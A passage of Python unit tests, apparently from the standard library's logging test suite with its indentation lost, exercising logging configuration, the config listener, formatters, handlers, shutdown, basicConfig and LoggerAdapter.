"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
#Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
#Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
#Nothing will be output since both handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
#Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
@unittest.skipUnless(threading, 'listen() needs threading to work')
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
t.join(2.0)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
#Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
#Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.apply_config(self.out_of_order)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
self.assertFalse(handler.matches(levelno=logging.ERROR, message='5'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='6'))
ZERO = datetime.timedelta(0)
class UTC(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
dst = utcoffset
def tzname(self, dt):
return 'UTC'
utc = UTC()
class FormatterTest(unittest.TestCase):
def setUp(self):
self.common = {
'name': 'formatter.test',
'level': logging.DEBUG,
'pathname': os.path.join('path', 'to', 'dummy.ext'),
'lineno': 42,
'exc_info': None,
'func': None,
'msg': 'Message with %d %s',
'args': (2, 'placeholders'),
}
self.variants = {
}
def get_record(self, name=None):
result = dict(self.common)
if name is not None:
result.update(self.variants[name])
return logging.makeLogRecord(result)
def test_percent(self):
# Test %-formatting
r = self.get_record()
f = logging.Formatter('${%(message)s}')
self.assertEqual(f.format(r), '${Message with 2 placeholders}')
f = logging.Formatter('%(random)s')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('%(asctime)s')
self.assertTrue(f.usesTime())
f = logging.Formatter('%(asctime)-15s')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime')
self.assertFalse(f.usesTime())
def test_braces(self):
# Test {}-formatting
r = self.get_record()
f = logging.Formatter('$%{message}%$', style='{')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('{random}', style='{')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('{asctime}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime!s:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('{asctime:15}', style='{')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='{')
self.assertFalse(f.usesTime())
def test_dollars(self):
# Test $-formatting
r = self.get_record()
f = logging.Formatter('$message', style='$')
self.assertEqual(f.format(r), 'Message with 2 placeholders')
f = logging.Formatter('$$%${message}%$$', style='$')
self.assertEqual(f.format(r), '$%Message with 2 placeholders%$')
f = logging.Formatter('${random}', style='$')
self.assertRaises(KeyError, f.format, r)
self.assertFalse(f.usesTime())
f = logging.Formatter('${asctime}', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('${asctime', style='$')
self.assertFalse(f.usesTime())
f = logging.Formatter('$asctime', style='$')
self.assertTrue(f.usesTime())
f = logging.Formatter('asctime', style='$')
self.assertFalse(f.usesTime())
def test_invalid_style(self):
self.assertRaises(ValueError, logging.Formatter, None, None, 'x')
def test_time(self):
r = self.get_record()
dt = datetime.datetime(1993, 4, 21, 8, 3, 0, 0, utc)
# We use None to indicate we want the local timezone
# We're essentially converting a UTC time to local time
r.created = time.mktime(dt.astimezone(None).timetuple())
r.msecs = 123
f = logging.Formatter('%(asctime)s %(message)s')
f.converter = time.gmtime
self.assertEqual(f.formatTime(r), '1993-04-21 08:03:00,123')
self.assertEqual(f.formatTime(r, '%Y:%d'), '1993:21')
f.format(r)
self.assertEqual(r.asctime, '1993-04-21 08:03:00,123')
class TestBufferingFormatter(logging.BufferingFormatter):
def formatHeader(self, records):
return '[(%d)' % len(records)
def formatFooter(self, records):
return '(%d)]' % len(records)
class BufferingFormatterTest(unittest.TestCase):
def setUp(self):
self.records = [
logging.makeLogRecord({'msg': 'one'}),
logging.makeLogRecord({'msg': 'two'}),
]
def test_default(self):
f = logging.BufferingFormatter()
self.assertEqual('', f.format([]))
self.assertEqual('onetwo', f.format(self.records))
def test_custom(self):
f = TestBufferingFormatter()
self.assertEqual('[(2)onetwo(2)]', f.format(self.records))
lf = logging.Formatter('<%(message)s>')
f = TestBufferingFormatter(lf)
self.assertEqual('[(2)<one><two>(2)]', f.format(self.records))
class ExceptionTest(BaseTest):
def test_formatting(self):
r = self.root_logger
h = RecordingHandler()
r.addHandler(h)
try:
raise RuntimeError('deliberate mistake')
except:
logging.exception('failed', stack_info=True)
r.removeHandler(h)
h.close()
r = h.records[0]
self.assertTrue(r.exc_text.startswith('Traceback (most recent '
'call last):\n'))
self.assertTrue(r.exc_text.endswith('\nRuntimeError: '
'deliberate mistake'))
self.assertTrue(r.stack_info.startswith('Stack (most recent '
'call last):\n'))
self.assertTrue(r.stack_info.endswith('logging.exception(\'failed\', '
'stack_info=True)'))
class LastResortTest(BaseTest):
def test_last_resort(self):
# Test the last resort handler
root = self.root_logger
root.removeHandler(self.root_hdlr)
old_lastresort = logging.lastResort
old_raise_exceptions = logging.raiseExceptions
try:
with support.captured_stderr() as stderr:
root.debug('This should not appear')
self.assertEqual(stderr.getvalue(), '')
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), 'Final chance!\n')
# No handlers and no last resort, so 'No handlers' message
logging.lastResort = None
with support.captured_stderr() as stderr:
root.warning('Final chance!')
msg = 'No handlers could be found for logger "root"\n'
self.assertEqual(stderr.getvalue(), msg)
# 'No handlers' message only printed once
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
# If raiseExceptions is False, no message is printed
root.manager.emittedNoHandlerWarning = False
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
root.warning('Final chance!')
self.assertEqual(stderr.getvalue(), '')
finally:
root.addHandler(self.root_hdlr)
logging.lastResort = old_lastresort
logging.raiseExceptions = old_raise_exceptions
class FakeHandler:
def __init__(self, identifier, called):
for method in ('acquire', 'flush', 'close', 'release'):
setattr(self, method, self.record_call(identifier, method, called))
def record_call(self, identifier, method_name, called):
def inner():
called.append('{} - {}'.format(identifier, method_name))
return inner
class RecordingHandler(logging.NullHandler):
def __init__(self, *args, **kwargs):
super(RecordingHandler, self).__init__(*args, **kwargs)
self.records = []
def handle(self, record):
"""Keep track of all the emitted records."""
self.records.append(record)
class ShutdownTest(BaseTest):
"""Test suite for the shutdown method."""
def setUp(self):
super(ShutdownTest, self).setUp()
self.called = []
raise_exceptions = logging.raiseExceptions
self.addCleanup(setattr, logging, 'raiseExceptions', raise_exceptions)
def raise_error(self, error):
def inner():
raise error()
return inner
def test_no_failure(self):
# create some fake handlers
handler0 = FakeHandler(0, self.called)
handler1 = FakeHandler(1, self.called)
handler2 = FakeHandler(2, self.called)
# create live weakref to those handlers
handlers = map(logging.weakref.ref, [handler0, handler1, handler2])
logging.shutdown(handlerList=list(handlers))
expected = ['2 - acquire', '2 - flush', '2 - close', '2 - release',
'1 - acquire', '1 - flush', '1 - close', '1 - release',
'0 - acquire', '0 - flush', '0 - close', '0 - release']
self.assertEqual(expected, self.called)
def _test_with_failure_in_method(self, method, error):
handler = FakeHandler(0, self.called)
setattr(handler, method, self.raise_error(error))
handlers = [logging.weakref.ref(handler)]
logging.shutdown(handlerList=list(handlers))
self.assertEqual('0 - release', self.called[-1])
def test_with_ioerror_in_acquire(self):
self._test_with_failure_in_method('acquire', OSError)
def test_with_ioerror_in_flush(self):
self._test_with_failure_in_method('flush', OSError)
def test_with_ioerror_in_close(self):
self._test_with_failure_in_method('close', OSError)
def test_with_valueerror_in_acquire(self):
self._test_with_failure_in_method('acquire', ValueError)
def test_with_valueerror_in_flush(self):
self._test_with_failure_in_method('flush', ValueError)
def test_with_valueerror_in_close(self):
self._test_with_failure_in_method('close', ValueError)
def test_with_other_error_in_acquire_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('acquire', IndexError)
def test_with_other_error_in_flush_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('flush', IndexError)
def test_with_other_error_in_close_without_raise(self):
logging.raiseExceptions = False
self._test_with_failure_in_method('close', IndexError)
def test_with_other_error_in_acquire_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'acquire', IndexError)
def test_with_other_error_in_flush_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'flush', IndexError)
def test_with_other_error_in_close_with_raise(self):
logging.raiseExceptions = True
self.assertRaises(IndexError, self._test_with_failure_in_method,
'close', IndexError)
class ModuleLevelMiscTest(BaseTest):
"""Test suite for some module level methods."""
def test_disable(self):
old_disable = logging.root.manager.disable
# confirm our assumptions are correct
self.assertEqual(old_disable, 0)
self.addCleanup(logging.disable, old_disable)
logging.disable(83)
self.assertEqual(logging.root.manager.disable, 83)
def _test_log(self, method, level=None):
called = []
support.patch(self, logging, 'basicConfig',
lambda *a, **kw: called.append((a, kw)))
recording = RecordingHandler()
logging.root.addHandler(recording)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me: %r", recording)
else:
log_method("test me: %r", recording)
self.assertEqual(len(recording.records), 1)
record = recording.records[0]
self.assertEqual(record.getMessage(), "test me: %r" % recording)
expected_level = level if level is not None else getattr(logging, method.upper())
self.assertEqual(record.levelno, expected_level)
# basicConfig was not called!
self.assertEqual(called, [])
def test_log(self):
self._test_log('log', logging.ERROR)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
def test_set_logger_class(self):
self.assertRaises(TypeError, logging.setLoggerClass, object)
class MyLogger(logging.Logger):
pass
logging.setLoggerClass(MyLogger)
self.assertEqual(logging.getLoggerClass(), MyLogger)
logging.setLoggerClass(logging.Logger)
self.assertEqual(logging.getLoggerClass(), logging.Logger)
@support.requires_type_collecting
def test_logging_at_shutdown(self):
# Issue #20037
code = """if 1:
import logging
class A:
def __del__(self):
try:
raise ValueError("some error")
except Exception:
logging.exception("exception in __del__")
a = A()"""
rc, out, err = assert_python_ok("-c", code)
err = err.decode()
self.assertIn("exception in __del__", err)
self.assertIn("ValueError: some error", err)
class LogRecordTest(BaseTest):
def test_str_rep(self):
r = logging.makeLogRecord({})
s = str(r)
self.assertTrue(s.startswith('<LogRecord: '))
self.assertTrue(s.endswith('>'))
def test_dict_arg(self):
h = RecordingHandler()
r = logging.getLogger()
r.addHandler(h)
d = {'less' : 'more' }
logging.warning('less is %(less)s', d)
self.assertIs(h.records[0].args, d)
self.assertEqual(h.records[0].message, 'less is more')
r.removeHandler(h)
h.close()
def test_multiprocessing(self):
r = logging.makeLogRecord({})
self.assertEqual(r.processName, 'MainProcess')
try:
import multiprocessing as mp
r = logging.makeLogRecord({})
self.assertEqual(r.processName, mp.current_process().name)
except ImportError:
pass
def test_optional(self):
r = logging.makeLogRecord({})
NOT_NONE = self.assertIsNotNone
if threading:
NOT_NONE(r.thread)
NOT_NONE(r.threadName)
NOT_NONE(r.process)
NOT_NONE(r.processName)
log_threads = logging.logThreads
log_processes = logging.logProcesses
log_multiprocessing = logging.logMultiprocessing
try:
logging.logThreads = False
logging.logProcesses = False
logging.logMultiprocessing = False
r = logging.makeLogRecord({})
NONE = self.assertIsNone
NONE(r.thread)
NONE(r.threadName)
NONE(r.process)
NONE(r.processName)
finally:
logging.logThreads = log_threads
logging.logProcesses = log_processes
logging.logMultiprocessing = log_multiprocessing
class BasicConfigTest(unittest.TestCase):
"""Test suite for logging.basicConfig."""
def setUp(self):
super(BasicConfigTest, self).setUp()
self.handlers = logging.root.handlers
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.original_logging_level = logging.root.level
self.addCleanup(self.cleanup)
logging.root.handlers = []
def tearDown(self):
for h in logging.root.handlers[:]:
logging.root.removeHandler(h)
h.close()
super(BasicConfigTest, self).tearDown()
def cleanup(self):
setattr(logging.root, 'handlers', self.handlers)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
logging.root.level = self.original_logging_level
def test_no_kwargs(self):
logging.basicConfig()
# handler defaults to a StreamHandler to sys.stderr
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, sys.stderr)
formatter = handler.formatter
# format defaults to logging.BASIC_FORMAT
self.assertEqual(formatter._style._fmt, logging.BASIC_FORMAT)
# datefmt defaults to None
self.assertIsNone(formatter.datefmt)
# style defaults to %
self.assertIsInstance(formatter._style, logging.PercentStyle)
# level is not explicitly set
self.assertEqual(logging.root.level, self.original_logging_level)
def test_strformatstyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="{")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_stringtemplatestyle(self):
with support.captured_stdout() as output:
logging.basicConfig(stream=sys.stdout, style="$")
logging.error("Log an error")
sys.stdout.seek(0)
self.assertEqual(output.getvalue().strip(),
"ERROR:root:Log an error")
def test_filename(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log')
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.FileHandler)
expected = logging.FileHandler('test.log', 'a')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.assertEqual(handler.stream.name, expected.stream.name)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_filemode(self):
def cleanup(h1, h2, fn):
h1.close()
h2.close()
os.remove(fn)
logging.basicConfig(filename='test.log', filemode='wb')
handler = logging.root.handlers[0]
expected = logging.FileHandler('test.log', 'wb')
self.assertEqual(handler.stream.mode, expected.stream.mode)
self.addCleanup(cleanup, handler, expected, 'test.log')
def test_stream(self):
stream = io.StringIO()
self.addCleanup(stream.close)
logging.basicConfig(stream=stream)
self.assertEqual(len(logging.root.handlers), 1)
handler = logging.root.handlers[0]
self.assertIsInstance(handler, logging.StreamHandler)
self.assertEqual(handler.stream, stream)
def test_format(self):
logging.basicConfig(format='foo')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter._style._fmt, 'foo')
def test_datefmt(self):
logging.basicConfig(datefmt='bar')
formatter = logging.root.handlers[0].formatter
self.assertEqual(formatter.datefmt, 'bar')
def test_style(self):
logging.basicConfig(style='$')
formatter = logging.root.handlers[0].formatter
self.assertIsInstance(formatter._style, logging.StringTemplateStyle)
def test_level(self):
old_level = logging.root.level
self.addCleanup(logging.root.setLevel, old_level)
logging.basicConfig(level=57)
self.assertEqual(logging.root.level, 57)
# Test that second call has no effect
logging.basicConfig(level=58)
self.assertEqual(logging.root.level, 57)
def test_incompatible(self):
assertRaises = self.assertRaises
handlers = [logging.StreamHandler()]
stream = sys.stderr
assertRaises(ValueError, logging.basicConfig, filename='test.log',
stream=stream)
assertRaises(ValueError, logging.basicConfig, filename='test.log',
handlers=handlers)
assertRaises(ValueError, logging.basicConfig, stream=stream,
handlers=handlers)
# Issue 23207: test for invalid kwargs
assertRaises(ValueError, logging.basicConfig, loglevel=logging.INFO)
# Should pop both filename and filemode even if filename is None
logging.basicConfig(filename=None, filemode='a')
def test_handlers(self):
handlers = [
logging.StreamHandler(),
logging.StreamHandler(sys.stdout),
logging.StreamHandler(),
]
f = logging.Formatter()
handlers[2].setFormatter(f)
logging.basicConfig(handlers=handlers)
self.assertIs(handlers[0], logging.root.handlers[0])
self.assertIs(handlers[1], logging.root.handlers[1])
self.assertIs(handlers[2], logging.root.handlers[2])
self.assertIsNotNone(handlers[0].formatter)
self.assertIsNotNone(handlers[1].formatter)
self.assertIs(handlers[2].formatter, f)
self.assertIs(handlers[0].formatter, handlers[1].formatter)
def _test_log(self, method, level=None):
# logging.root has no handlers so basicConfig should be called
called = []
old_basic_config = logging.basicConfig
def my_basic_config(*a, **kw):
old_basic_config()
old_level = logging.root.level
logging.root.setLevel(100) # avoid having messages in stderr
self.addCleanup(logging.root.setLevel, old_level)
called.append((a, kw))
support.patch(self, logging, 'basicConfig', my_basic_config)
log_method = getattr(logging, method)
if level is not None:
log_method(level, "test me")
else:
log_method("test me")
# basicConfig was called with no arguments
self.assertEqual(called, [((), {})])
def test_log(self):
self._test_log('log', logging.WARNING)
def test_debug(self):
self._test_log('debug')
def test_info(self):
self._test_log('info')
def test_warning(self):
self._test_log('warning')
def test_error(self):
self._test_log('error')
def test_critical(self):
self._test_log('critical')
class LoggerAdapterTest(unittest.TestCase):
def setUp(self):
super(LoggerAdapterTest, self).setUp()
old_handler_list = logging._handlerList[:]
self.recording = RecordingHandler()
self.logger = logging.root
self.logger.addHandler(self.recording)
self.addCleanup(self.logger.removeHandler, self.recording)
self.addCleanup(self.recording.close)
def cleanup():
logging._handlerList[:] = old_handler_list
self.addCleanup(cleanup)
self.addCleanup(logging.shutdown)
self.adapter = logging.LoggerAdapter(logger=self.logger, extra=None)
def test_exception(self):
msg = 'testing exception: %r'
exc = None
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception(msg, self.recording)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.levelno, logging.ERROR)
self.assertEqual(record.msg, msg)
self.assertEqual(record.args, (self.recording,))
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_exception_excinfo(self):
try:
1 / 0
except ZeroDivisionError as e:
exc = e
self.adapter.exception('exc_info test', exc_info=exc)
self.assertEqual(len(self.recording.records), 1)
record = self.recording.records[0]
self.assertEqual(record.exc_info,
(exc.__class__, exc, exc.__traceback__))
def test_critical(self):
msg = 'critical test! %r'
